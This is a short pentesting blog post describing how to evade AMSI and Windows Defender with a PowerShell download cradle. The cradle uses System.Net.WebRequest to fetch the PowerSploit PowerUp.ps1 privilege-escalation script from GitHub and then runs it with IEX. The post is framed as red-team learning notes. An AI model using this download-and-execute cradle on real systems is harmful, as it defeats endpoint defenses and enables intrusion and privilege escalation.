How to Bypass AMSI with an Unconventional Powershell Cradle
I am writing this article to keep my notes while learning new ways of using PowerShell for Pentesting and Red teaming.
This post is about bypassing Microsoft Windows Defender and AMSI to download and execute the cradle for malicious powershell scripts ;). Will try to make this post as precise as I can.
While working with my educational research project, I have been trying to find the new ways to bypass the AMSI for executing the powershell scripts and commands which are considered to be malicious and flagged by Microsoft Windows Defender.
Just for note, Protection definitions are up to date:
I was trying to run PrivEsc enumeration script “PowerUp”
PowerSploit - A PowerShell Post-Exploitation Framework - PowerShellMafia/PowerSploitgithub.com
But as expected, the AMSI was awake already :P and it blocked me from running the cradle:
I thought to try it by using some other .NET classes other than Net.WebClient. I am not good at programming so googled, and found System.Net.WebRequest class.
The .NET Framework provides protocol-specific classes derived from the WebRequest and WebResponse classes for URIs that…docs.microsoft.com
Playing around for a while I came up with below script:
$webreq = [System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1’)
After setting all up, its as simple as IEX :P
Thanks :) May be I come up with a shorter version of this.